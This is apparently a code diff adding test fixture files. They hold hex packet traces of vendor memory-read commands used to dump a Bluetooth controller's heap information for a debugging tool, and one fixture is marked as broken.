RX 0eff014dfc0008094e657875732035170305110a110c110e111211151116111f112f1100123211010501070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000107a21000e0a014dfc00f1
TX 0108004dfc05af79210007
RX 0000000900000009000000020000000000e269c210138340
RX 01
RX 4dfc05af79210007
RX 0000000e0000000e00000003
RX 0000000000e269c210138aa9
RX 040e0b014dfc00037dc795f80461
Socket closed
tests/traces/adbcore/info_heap.trace
+685
View File
@@ -0,0 +1,685 @@
# info heap
TX 010300011000
RX 0000000400000004000000020000000000e269c200a6dc56
RX 01011000
RX 0000000f0000000f000000030000000000e269c2
RX 00a717ec
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc059430200004
RX 000000030000000300000003
RX 0000000000e269c200a87965
RX 07f001
RX 00000009000000090000000200000000
RX 00e269c200a8e193
RX 01
RX 4dfc059430200004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00a918e2
RX 040e08014dfc00c85d2000
TX 0108004dfc05c85d200030
RX 000000090000000900000002
RX 0000000000e269c200aab793
RX 014dfc05c85d200030
RX 00000037
RX 000000370000000300000000
RX 00e269c200aaf0ec
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000a4792100a479210020010000200000000000000000000000f85d200068ec2000
TX 0108004dfc05a479210004
RX 000000090000000900000002
RX 0000000000e269c200acb1ba
RX 014dfc05a479210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200ace5c2
RX 04
RX 0e08014dfc00c85d2000
TX 0108004dfc05c879210004
RX 000000090000000900000002
RX 0000000000e269c200ae2501
RX 014dfc05c879210004
RX 0000000b0000000b0000000300000000
RX 00e269c200ae5915
RX 04
RX 0e08014dfc00587a2100
TX 0108004dfc05ec79210004
RX 0000000900000009000000020000000000e269c200b01eae
RX 01
RX 4dfc05ec79210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200b04d6c
RX 04
RX 0e08014dfc007c7a2100
TX 0108004dfc05107a210004
RX 0000000900000009000000020000000000e269c200b19061
RX 014dfc05107a210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200b1c4f3
RX 04
RX 0e08014dfc00c8792100
TX 0108004dfc05347a210004
RX 0000000900000009000000020000000000e269c200b38d00
RX 01
RX 4dfc05347a210004
RX 0000000b0000000b
RX 000000030000000000e269c200b3bbaa
RX 040e08014dfc00c85d2000
TX 0108004dfc05587a210004
RX 0000000900000009000000020000000000e269c200b58252
RX 014dfc05587a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b5b18b
RX 040e08014dfc00ec792100
TX 0108004dfc057c7a210004
RX 0000000900000009000000020000000000e269c200b6f455
RX 014dfc057c7a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b728c4
RX 040e08014dfc00a07a2100
TX 0108004dfc05a07a210004
RX 000000090000000900000002
RX 0000000000e269c200b8f1d6
RX 014dfc05a07a210004
RX 0000000b0000000b000000030000000000e269c2
RX 00b92612
RX 040e08014dfc0000000000
TX 0108004dfc05f85d200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ba65be
RX 014dfc05f85d200030
RX 00000037000000370000000300000000
RX 00e269c200ba9b76
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000087b2100c47a210020020000400000000000000000000000285e2000c85d2000
TX 0108004dfc05c47a210004
RX 000000090000000900000002
RX 0000000000e269c200bc6390
RX 014dfc05c47a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bc987e
RX 04
RX 0e08014dfc00087b2100
TX 0108004dfc05087b210004
RX 0000000900000009000000020000000000e269c2
RX 00bdd708
RX 014dfc05087b210004
RX 0000000b0000000b0000000300000000
RX 00e269c200be075f
RX 04
RX 0e08014dfc004c7b2100
TX 0108004dfc054c7b210004
RX 0000000900000009000000020000000000e269c200bfd07f
RX 014dfc054c7b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bfffe2
RX 040e08014dfc00907b2100
TX 0108004dfc05907b210004
RX 000000090000000900000002
RX 0000000000e269c200c1c264
RX 014dfc05907b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c1fba1
RX 040e08014dfc00d47b2100
TX 0108004dfc05d47b210004
RX 000000090000000900000002
RX 0000000000e269c200c339f3
RX 014dfc05d47b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c36f64
RX 040e08014dfc00187c2100
TX 0108004dfc05187c210004
RX 0000000900000009000000020000000000e269c200c53386
RX 014dfc05187c210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c56249
RX 040e08014dfc005c7c2100
TX 0108004dfc055c7c210004
RX 0000000900000009000000020000000000e269c2
RX 00c6a64c
RX 014dfc055c7c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c6d51e
RX 04
RX 0e08014dfc00a07c2100
TX 0108004dfc05a07c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00c8a176
RX 014dfc05a07c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c8daef
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05285e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ca1661
RX 014dfc05285e200030
RX 000000370000003700000003
RX 0000000000e269c200ca4c0b
RX 040e34014dfc00434f4c42000000000a0000000a000000e47c2100e47c2100780a0000080100000000000000000000885e2000f85d2000
TX 0108004dfc05e47c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cc13aa
RX 014dfc05e47c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cc49c8
RX 04
RX 0e08014dfc00f07d2100
TX 0108004dfc05f07d210004
RX 00000009000000090000000200000000
RX 00e269c200ce084a
RX 014dfc05f07d210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00ce3d02
RX 040e08014dfc00fc7e2100
TX 0108004dfc05fc7e210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cf7abc
RX 014dfc05fc7e210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cfafff
RX 04
RX 0e08014dfc0008802100
TX 0108004dfc050880210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d1718e
RX 014dfc050880210004
RX 0000000b0000000b0000000300000000
RX 00e269c200d1ad02
RX 040e08014dfc0014812100
TX 0108004dfc051481210004
RX 0000000900000009000000020000000000e269c200d2e49d
RX 01
RX 4dfc051481210004
RX 0000000b0000000b
RX 000000030000000000e269c200d313fc
RX 040e08014dfc0020822100
TX 0108004dfc052082210004
RX 0000000900000009000000020000000000e269c2
RX 00d4dfc6
RX 014dfc052082210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d50e59
RX 040e08014dfc002c832100
TX 0108004dfc052c83210004
RX 00000009000000090000000200000000
RX 00e269c200d65308
RX 01
RX 4dfc052c83210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00d68806
RX 040e08014dfc0038842100
TX 0108004dfc053884210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d84aba
RX 014dfc053884210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d88584
RX 040e08014dfc0044852100
TX 0108004dfc054485210004
RX 0000000900000009000000020000000000e269c2
RX 00da42d6
RX 014dfc054485210004
RX 0000000b0000000b00000003
RX 0000000000e269c200da7651
RX 040e08014dfc0050862100
TX 0108004dfc055086210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00dbba9e
RX 014dfc055086210004
RX 0000000b0000000b00000003
RX 0000000000e269c200dbf538
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05885e200030
RX 00000009000000090000000200000000
RX 00e269c200ddb037
RX 01
RX 4dfc05885e200030
RX 000000370000003700000003
RX 0000000000e269c200dde9b6
RX 040e34014dfc00434f4c4200000000040000000400000024c6210024c62100b0100000280400000000000000000000585e2000285e2000
TX 0108004dfc0524c6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00df268a
RX 014dfc0524c6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200df5cd7
RX 040e08014dfc0050ca2100
TX 0108004dfc0550ca210004
RX 0000000900000009000000020000000000e269c2
RX 00e11eb6
RX 01
RX 4dfc0550ca210004
RX 0000000b0000000b00000003
RX 0000000000e269c200e15819
RX 040e08014dfc007cce2100
TX 0108004dfc057cce210004
RX 00000009000000090000000200000000
RX 00e269c200e29334
RX 01
RX 4dfc057cce210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00e2c73e
RX 040e08014dfc00a8d22100
TX 0108004dfc05a8d2210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e4925e
RX 014dfc05a8d2210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200e4c673
RX 040e08014dfc0000000000
TX 0108004dfc05585e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e5ff65
RX 014dfc05585e200030
RX 000000370000003700000003
RX 0000000000e269c200e63326
RX 040e34014dfc00434f4c42000000001000000010000000d4d62100d4d621008044000044040000000000000000000038ec2000885e2000
TX 0108004dfc05d4d6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e7fcce
RX 014dfc05d4d6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200e8313f
RX 040e08014dfc001cdb2100
TX 0108004dfc051cdb210004
RX 0000000900000009000000020000000000e269c200e9f3c0
RX 014dfc051cdb210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00ea223f
RX 040e08014dfc0064df2100
TX 0108004dfc0564df210004
RX 00000009000000090000000200000000
RX 00e269c200eb6947
RX 01
RX 4dfc0564df210004
RX 0000000b0000000b00000003
RX 0000000000e269c200eb9dc8
RX 04
RX 0e08014dfc00ace32100
TX 0108004dfc05ace3210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ed6025
RX 014dfc05ace3210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00edb820
RX 040e08014dfc00f4e72100
TX 0108004dfc05f4e7210004
RX 00000009000000090000000200000000
RX 00e269c200eeaa84
RX 014dfc05f4e7210004
RX 0000000b0000000b000000030000000000e269c200eeb23c
RX 04
RX 0e08014dfc003cec2100
TX 0108004dfc053cec210004
RX 0000000900000009
RX 000000020000000000e269c200ef25f0
RX 01
RX 4dfc053cec210004
RX 0000000b
RX 0000000b000000030000000000e269c200ef2e26
RX 04
RX 0e08014dfc0084f02100
TX 0108004dfc0584f0210004
RX 0000000900000009000000020000000000e269c200efa285
RX 014dfc0584f0210004
RX 0000000b
RX 0000000b000000030000000000e269c200efa979
RX 040e08014dfc00ccf42100
TX 0108004dfc05ccf4210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f0207c
RX 014dfc05ccf4210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f028c8
RX 04
RX 0e08014dfc0014f92100
TX 0108004dfc0514f9210004
RX 0000000900000009000000020000000000e269c200f0b8fd
RX 014dfc0514f9210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f0bf4a
RX 040e08014dfc005cfd2100
TX 0108004dfc055cfd210004
RX 00000009000000090000000200000000
RX 00e269c200f11c7d
RX 01
RX 4dfc055cfd210004
RX 0000000b0000000b00000003
RX 0000000000e269c200f12aa4
RX 040e08014dfc00a4012200
TX 0108004dfc05a401220004
RX 0000000900000009000000020000000000e269c200f1946c
RX 014dfc05a401220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f19f40
RX 040e08014dfc00ec052200
TX 0108004dfc05ec05220004
RX 0000000900000009000000020000000000e269c200f20f44
RX 01
RX 4dfc05ec05220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f21b6a
RX 04
RX 0e08014dfc00340a2200
TX 0108004dfc05340a220004
RX 0000000900000009000000020000000000e269c200f29be7
RX 014dfc05340a220004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00f2b3bd
RX 040e08014dfc007c0e2200
TX 0108004dfc057c0e220004
RX 00000009
RX 00000009
RX 0000000200000000
RX 00e269c200f3a7c6
RX 01
RX 4dfc057c0e220004
RX 0000000b0000000b000000030000000000e269c2
RX 00f4951f
RX 040e08014dfc00c4122200
TX 0108004dfc05c412220004
RX 0000000900000009
RX 000000020000000000e269c200f637e5
RX 014dfc05c412220004
RX 0000000b0000000b000000030000000000e269c200f63f91
RX 040e08014dfc000c172200
TX 0108004dfc050c17220004
RX 00000009
RX 000000090000000200000000
RX 00e269c200f6f156
RX 014dfc050c17220004
RX 0000000b0000000b0000000300000000
RX 00e269c200f6f966
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0538ec200030
RX 00000009000000090000000200000000
RX 00e269c200f76de0
RX 014dfc0538ec200030
RX 0000003700000037000000030000000000e269c200f7757d
RX 040e34014dfc00434f4c42000000000f0000000f000000541b2200541b22009402000028000000000000000000000068ec2000585e2000
TX 0108004dfc05541b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f8133d
RX 014dfc05541b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f83a20
RX 04
RX 0e08014dfc00801b2200
TX 0108004dfc05801b220004
RX 0000000900000009000000020000000000e269c200f909ee
RX 014dfc05801b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f935e2
RX 04
RX 0e08014dfc00ac1b2200
TX 0108004dfc05ac1b220004
RX 0000000900000009000000020000000000e269c2
RX 00fb146c
RX 014dfc05ac1b220004
RX 0000000b
RX 0000000b00000003
RX 0000000000e269c200fb4327
RX 040e08014dfc00d81b2200
TX 0108004dfc05d81b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00fd0682
RX 014dfc05d81b220004
RX 0000000b0000000b0000000300000000
RX 00e269c200fd3fca
RX 04
RX 0e08014dfc00041c2200
TX 0108004dfc05041c220004
RX 00000009000000090000000200000000
RX 00e269c200fe7d8e
RX 01
RX 4dfc05041c220004
RX 0000000b0000000b00000003
RX 0000000000e269c200feb0d4
RX 040e08014dfc00301c2200
TX 0108004dfc05301c220004
RX 0000000900000009000000020000000000e269c2
RX 010074cc
RX 014dfc05301c220004
RX 0000000b0000000b0000000300000000
RX 00e269c20100a76b
RX 04
RX 0e08014dfc005c1c2200
TX 0108004dfc055c1c220004
RX 0000000900000009000000020000000000e269c20101eacb
RX 014dfc055c1c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201021779
RX 04
RX 0e08014dfc00881c2200
TX 0108004dfc05881c220004
RX 0000000900000009000000020000000000e269c20103e6c3
RX 014dfc05881c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201041515
RX 04
RX 0e08014dfc00b41c2200
TX 0108004dfc05b41c220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 01055aa2
RX 014dfc05b41c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201058f0e
RX 040e08014dfc00e01c2200
TX 0108004dfc05e01c220004
RX 000000090000000900000002
RX 0000000000e269c201075199
RX 014dfc05e01c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201078a8c
RX 04
RX 0e08014dfc000c1d2200
TX 0108004dfc050c1d220004
RX 0000000900000009000000020000000000e269c2
RX 010948a2
RX 014dfc050c1d220004
RX 0000000b0000000b0000000300000000
RX 00e269c201097c0d
RX 04
RX 0e08014dfc00381d2200
TX 0108004dfc05381d220004
RX 0000000900000009
RX 000000020000000000e269c2010ac2b3
RX 014dfc05381d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2010afeef
RX 04
RX 0e08014dfc00641d2200
TX 0108004dfc05641d220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 010cbc41
RX 014dfc05641d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010cefe5
RX 040e08014dfc00901d2200
TX 0108004dfc05901d220004
RX 00000009000000090000000200000000
RX 00e269c2010e2df1
RX 01
RX 4dfc05901d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010e61ea
RX 040e08014dfc00bc1d2200
TX 0108004dfc05bc1d220004
RX 000000090000000900000002
RX 0000000000e269c20110231e
RX 014dfc05bc1d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201105c92
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0568ec200030
RX 0000000900000009000000020000000000e269c2
RX 01119816
RX 014dfc0568ec200030
RX 00000037000000370000000300000000
RX 00e269c20111c667
RX 04
RX 0e34014dfc00434f4c42000000000f0000000f000000e81d2200e81d22001c020000200000000000000000000000c85d200038ec2000
TX 0108004dfc05e81d220004
RX 00000009000000090000000200000000
RX 00e269c201138f25
RX 01
RX 4dfc05e81d220004
RX 0000000b0000000b
RX 000000030000000000e269c20113c768
RX 040e08014dfc000c1e2200
TX 0108004dfc050c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011507e7
RX 014dfc050c1e220004
RX 0000000b0000000b0000000300000000
RX 00e269c201153d26
RX 04
RX 0e08014dfc00301e2200
TX 0108004dfc05301e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0116fe0e
RX 014dfc05301e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201173734
RX 04
RX 0e08014dfc00541e2200
TX 0108004dfc05541e220004
RX 0000000900000009000000020000000000e269c20118f296
RX 014dfc05541e220004
RX 0000000b0000000b
RX 000000030000000000e269c2011926ef
RX 040e08014dfc00781e2200
TX 0108004dfc05781e220004
RX 0000000900000009000000020000000000e269c2011a6bbe
RX 014dfc05781e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2011a9958
RX 04
RX 0e08014dfc009c1e2200
TX 0108004dfc059c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011c676b
RX 014dfc059c1e220004
RX 0000000b0000000b00000003
RX 0000000000e269c2011c9b6e
RX 040e08014dfc00c01e2200
TX 0108004dfc05c01e220004
RX 0000000900000009000000020000000000e269c2
RX 011dda94
RX 014dfc05c01e220004
RX 0000000b0000000b0000000300000000
RX 00e269c2011e0829
RX 04
RX 0e08014dfc00e41e2200
TX 0108004dfc05e41e220004
RX 0000000900000009000000020000000000e269c2011fd393
RX 014dfc05e41e220004
RX 0000000b0000000b
RX 0000000300000000
RX 00e269c201200234
RX 040e08014dfc00081f2200
TX 0108004dfc05081f220004
RX 0000000900000009000000020000000000e269c2
RX 012145f7
RX 014dfc05081f220004
RX 0000000b0000000b0000000300000000
RX 00e269c20121a431
RX 04
RX 0e08014dfc002c1f2200
TX 0108004dfc052c1f220004
RX 000000090000000900000002
RX 0000000000e269c201230eec
RX 014dfc052c1f220004
RX 0000000b0000000b0000000300000000
RX 00e269c201231658
RX 040e08014dfc00501f2200
TX 0108004dfc05501f220004
RX 0000000900000009
RX 000000020000000000e269c20124484f
RX 014dfc05501f220004
RX 0000000b0000000b0000000300000000
RX 00e269c201244f7a
RX 040e08014dfc00741f2200
TX 0108004dfc05741f220004
RX 00000009
RX 00000009000000020000000000e269c201250543
RX 01
RX 4dfc05741f220004
RX 0000000b0000000b000000030000000000e269c2
RX 01250d7b
RX 040e08014dfc00981f2200
TX 0108004dfc05981f220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0125e492
RX 014dfc05981f220004
RX 0000000b0000000b00000003
RX 0000000000e269c201260ab3
RX 040e08014dfc00bc1f2200
TX 0108004dfc05bc1f220004
RX 0000000900000009000000020000000000e269c2
RX 01276da0
RX 014dfc05bc1f220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201279c46
RX 040e08014dfc00e01f2200
TX 0108004dfc05e01f220004
RX 0000000900000009000000020000000000e269c2
RX 0128e461
RX 014dfc05e01f220004
RX 0000000b0000000b00000003
RX 0000000000e269c2012914b3
RX 040e08014dfc0000000000
Socket closed
tests/traces/adbcore/info_heap_s8.trace.broken
+747
View File
@@ -0,0 +1,747 @@
# info heap
TX 01011000
RX 0000000f0000000f000000030000000000e27beebf93dd9f
RX 040e0c01011000094f01090f001a41
TX 014dfc057c06200004
RX 0000000b0000000b000000030000000000e27beebf9481eb
RX 040e08014dfc009c062000
TX 014dfc059c06200030
RX 0000003700000037000000030000000000e27beebf94e223
RX 040e34014dfc00bc06200020006000782a2100b82a21005f02047300000000000000005c00b8ebdc06200060003e007836210078362100
TX 014dfc05782a210004
RX 0000000b0000000b000000030000000000e27beebf951eb3
RX 040e08014dfc00f82a2100
TX 014dfc059c2a210004
RX 0000000b0000000b000000030000000000e27beebf955ded
RX 040e08014dfc003f700000
TX 014dfc05c02a210004
RX 0000000b0000000b000000030000000000e27beebf95a038
RX 040e08014dfc000e08014d
TX 014dfc05e42a210004
RX 0000000b0000000b000000030000000000e27beebf95ddda
RX 040e08014dfc00cc118300
TX 014dfc05082b210004
RX 0000000b0000000b000000030000000000e27beebf960919
RX 040e08014dfc00057e2f20
TX 014dfc052c2b210004
RX 0000000b0000000b000000030000000000e27beebf961c69
RX 040e08014dfc0055382000
TX 014dfc05502b210004
RX 0000000b0000000b000000030000000000e27beebf964a96
RX 040e08014dfc00ffff0100
TX 014dfc05742b210004
RX 0000000b0000000b000000030000000000e27beebf969a6a
RX 040e08014dfc0000000000
TX 014dfc05982b210004
RX 0000000b0000000b000000030000000000e27beebf96fad6
RX 040e08014dfc00b82b2100
TX 014dfc05bc2b210004
RX 0000000b0000000b000000030000000000e27beebf973df6
RX 040e08014dfc000000ffff
TX 014dfc05e02b210004
RX 0000000b0000000b000000030000000000e27beebf97805e
RX 040e08014dfc0000000010
TX 014dfc05042c210004
RX 0000000b0000000b000000030000000000e27beebf97c6f5
RX 040e08014dfc00ffff0038
TX 014dfc05282c210004
RX 0000000b0000000b000000030000000000e27beebf9805a2
RX 040e08014dfc00e000004c
TX 014dfc054c2c210004
RX 0000000b0000000b000000030000000000e27beebf9847c9
RX 040e08014dfc0065000000
TX 014dfc05702c210004
RX 0000000b0000000b000000030000000000e27beebf98a930
RX 040e08014dfc006500a800
TX 014dfc05942c210004
RX 0000000b0000000b000000030000000000e27beebf99108a
RX 040e08014dfc00d0010300
TX 014dfc05b82c210004
RX 0000000b0000000b000000030000000000e27beebf99524c
RX 040e08014dfc00d82c2100
TX 014dfc05dc2c210004
RX 0000000b0000000b000000030000000000e27beebf99929f
RX 040e08014dfc0000000000
TX 014dfc05002d210004
RX 0000000b0000000b000000030000000000e27beebf99d466
RX 040e08014dfc0000000000
TX 014dfc05242d210004
RX 0000000b0000000b000000030000000000e27beebf9a15bc
RX 040e08014dfc00ffff80ff
TX 014dfc05482d210004
RX 0000000b0000000b000000030000000000e27beebf9a56d4
RX 040e08014dfc0000000500
TX 014dfc056c2d210004
RX 0000000b0000000b000000030000000000e27beebf9a9929
RX 040e08014dfc0000ec0301
TX 014dfc05902d210004
RX 0000000b0000000b000000030000000000e27beebf9adc19
RX 040e08014dfc0045432000
TX 014dfc05b42d210004
RX 0000000b0000000b000000030000000000e27beebf9b4126
RX 040e08014dfc0000010003
TX 014dfc05d82d210004
RX 0000000b0000000b000000030000000000e27beebf9ba307
RX 040e08014dfc00f82d2100
TX 014dfc05fc2d210004
RX 0000000b0000000b000000030000000000e27beebf9be4fe
RX 040e08014dfc0000ff0000
TX 014dfc05202e210004
RX 0000000b0000000b000000030000000000e27beebf9c2a13
RX 040e08014dfc0000a80360
TX 014dfc05442e210004
RX 0000000b0000000b000000030000000000e27beebf9c6c61
RX 040e08014dfc0014000000
TX 014dfc05682e210004
RX 0000000b0000000b000000030000000000e27beebf9cab70
RX 040e08014dfc002f000000
TX 014dfc058c2e210004
RX 0000000b0000000b000000030000000000e27beebf9cebaf
RX 040e08014dfc005f000000
TX 014dfc05b02e210004
RX 0000000b0000000b000000030000000000e27beebf9d6ba8
RX 040e08014dfc002f000000
TX 014dfc05d42e210004
RX 0000000b0000000b000000030000000000e27beebf9dad08
RX 040e08014dfc002f000000
TX 014dfc05f82e210004
RX 0000000b0000000b000000030000000000e27beebf9dee39
RX 040e08014dfc00182f2100
TX 014dfc051c2f210004
RX 0000000b0000000b000000030000000000e27beebf9e3190
RX 040e08014dfc0022000000
TX 014dfc05402f210004
RX 0000000b0000000b000000030000000000e27beebf9e71b0
RX 040e08014dfc0000000000
TX 014dfc05642f210004
RX 0000000b0000000b000000030000000000e27beebf9eb2b9
RX 040e08014dfc0000000000
TX 014dfc05882f210004
RX 0000000b0000000b000000030000000000e27beebf9ef366
RX 040e08014dfc00002f0000
TX 014dfc05ac2f210004
RX 0000000b0000000b000000030000000000e27beebf9f354b
RX 040e08014dfc00006f0000
TX 014dfc05d02f210004
RX 0000000b0000000b000000030000000000e27beebf9f7655
RX 040e08014dfc00002f0000
TX 014dfc05f42f210004
RX 0000000b0000000b000000030000000000e27beebf9fb7ca
RX 040e08014dfc00002f0000
TX 014dfc051830210004
RX 0000000b0000000b000000030000000000e27beebfa01abc
RX 040e08014dfc0038302100
TX 014dfc053c30210004
RX 0000000b0000000b000000030000000000e27beebfa0b97a
RX 040e08014dfc0000220000
TX 014dfc056030210004
RX 0000000b0000000b000000030000000000e27beebfa0fbc8
RX 040e08014dfc0000000000
TX 014dfc058430210004
RX 0000000b0000000b000000030000000000e27beebfa13d4e
RX 040e08014dfc0000000000
TX 014dfc05a830210004
RX 0000000b0000000b000000030000000000e27beebfa17f0c
RX 040e08014dfc0006000000
TX 014dfc05cc30210004
RX 0000000b0000000b000000030000000000e27beebfa1bf98
RX 040e08014dfc00034100ff
TX 014dfc05f030210004
RX 0000000b0000000b000000030000000000e27beebfa2020e
RX 040e08014dfc00a594a534
TX 014dfc051431210004
RX 0000000b0000000b000000030000000000e27beebfa267d2
RX 040e08014dfc0000ff0080
TX 014dfc053831210004
RX 0000000b0000000b000000030000000000e27beebfa2c994
RX 040e08014dfc0058312100
TX 014dfc055c31210004
RX 0000000b0000000b000000030000000000e27beebfa32ad9
RX 040e08014dfc00ffef3df1
TX 014dfc058031210004
RX 0000000b0000000b000000030000000000e27beebfa3cb04
RX 040e08014dfc00034100ff
TX 014dfc05a431210004
RX 0000000b0000000b000000030000000000e27beebfa40c2c
RX 040e08014dfc002800ac01
TX 014dfc05c831210004
RX 0000000b0000000b000000030000000000e27beebfa46da9
RX 040e08014dfc0028000000
TX 014dfc05ec31210004
RX 0000000b0000000b000000030000000000e27beebfa4cc7e
RX 040e08014dfc0000400000
TX 014dfc051032210004
RX 0000000b0000000b000000030000000000e27beebfa52e35
RX 040e08014dfc0000ffffff
TX 014dfc053432210004
RX 0000000b0000000b000000030000000000e27beebfa5ccaa
RX 040e08014dfc0000000005
TX 014dfc055832210004
RX 0000000b0000000b000000030000000000e27beebfa62bf3
RX 040e08014dfc0078322100
TX 014dfc057c32210004
RX 0000000b0000000b000000030000000000e27beebfa6cbdb
RX 040e08014dfc0000002000
TX 014dfc05a032210004
RX 0000000b0000000b000000030000000000e27beebfa70e9e
RX 040e08014dfc00a3ce1400
TX 014dfc05c432210004
RX 0000000b0000000b000000030000000000e27beebfa7529e
RX 040e08014dfc00eb049005
TX 014dfc05e832210004
RX 0000000b0000000b000000030000000000e27beebfa7b27a
RX 040e08014dfc0045064506
TX 014dfc050c33210004
RX 0000000b0000000b000000030000000000e27beebfa7db6c
RX 040e08014dfc006004a104
TX 014dfc053033210004
RX 0000000b0000000b000000030000000000e27beebfa82c47
RX 040e08014dfc0026052605
TX 014dfc055433210004
RX 0000000b0000000b000000030000000000e27beebfa88acc
RX 040e08014dfc00ffac02ff
TX 014dfc057833210004
RX 0000000b0000000b000000030000000000e27beebfa8ce07
RX 040e08014dfc0098332100
TX 014dfc059c33210004
RX 0000000b0000000b000000030000000000e27beebfa912b5
RX 040e08014dfc00c004ffc4
TX 014dfc05c033210004
RX 0000000b0000000b000000030000000000e27beebfa954ce
RX 040e08014dfc003c323232
TX 014dfc05e433210004
RX 0000000b0000000b000000030000000000e27beebfa994a5
RX 040e08014dfc0010101010
TX 014dfc050834210004
RX 0000000b0000000b000000030000000000e27beebfa9d741
RX 040e08014dfc0077777777
TX 014dfc052c34210004
RX 0000000b0000000b000000030000000000e27beebfaa3962
RX 040e08014dfc006f6f6f0f
TX 014dfc055034210004
RX 0000000b0000000b000000030000000000e27beebfaa9ffe
RX 040e08014dfc0074078c8c
TX 014dfc057434210004
RX 0000000b0000000b000000030000000000e27beebfab0517
RX 040e08014dfc00ff060100
TX 014dfc059834210004
RX 0000000b0000000b000000030000000000e27beebfab669f
RX 040e08014dfc00b8342100
TX 014dfc05bc34210004
RX 0000000b0000000b000000030000000000e27beebfabc8a4
RX 040e08014dfc009f747474
TX 014dfc05e034210004
RX 0000000b0000000b000000030000000000e27beebfac29a6
RX 040e08014dfc009f9f9f9f
TX 014dfc050435210004
RX 0000000b0000000b000000030000000000e27beebfac8aea
RX 040e08014dfc007f7f7f7f
TX 014dfc052835210004
RX 0000000b0000000b000000030000000000e27beebfacef98
RX 040e08014dfc007272727c
TX 014dfc054c35210004
RX 0000000b0000000b000000030000000000e27beebfad5616
RX 040e08014dfc0004eb04eb
TX 014dfc057035210004
RX 0000000b0000000b000000030000000000e27beebfadf65e
RX 040e08014dfc0006450645
TX 014dfc059435210004
RX 0000000b0000000b000000030000000000e27beebfae3a18
RX 040e08014dfc0004600460
TX 014dfc05b835210004
RX 0000000b0000000b000000030000000000e27beebfae9e98
RX 040e08014dfc00d8352100
TX 014dfc05dc35210004
RX 0000000b0000000b000000030000000000e27beebfaeff80
RX 040e08014dfc00ffa802ff
TX 014dfc050036210004
RX 0000000b0000000b000000030000000000e27beebfaf61dc
RX 040e08014dfc0007ffc807
TX 014dfc052436210004
RX 0000000b0000000b000000030000000000e27beebfafc1f3
RX 040e08014dfc00bc04ffc0
TX 014dfc054836210004
RX 0000000b0000000b000000030000000000e27beebfb0252b
RX 040e08014dfc003c3c3c3c
TX 014dfc056c36210004
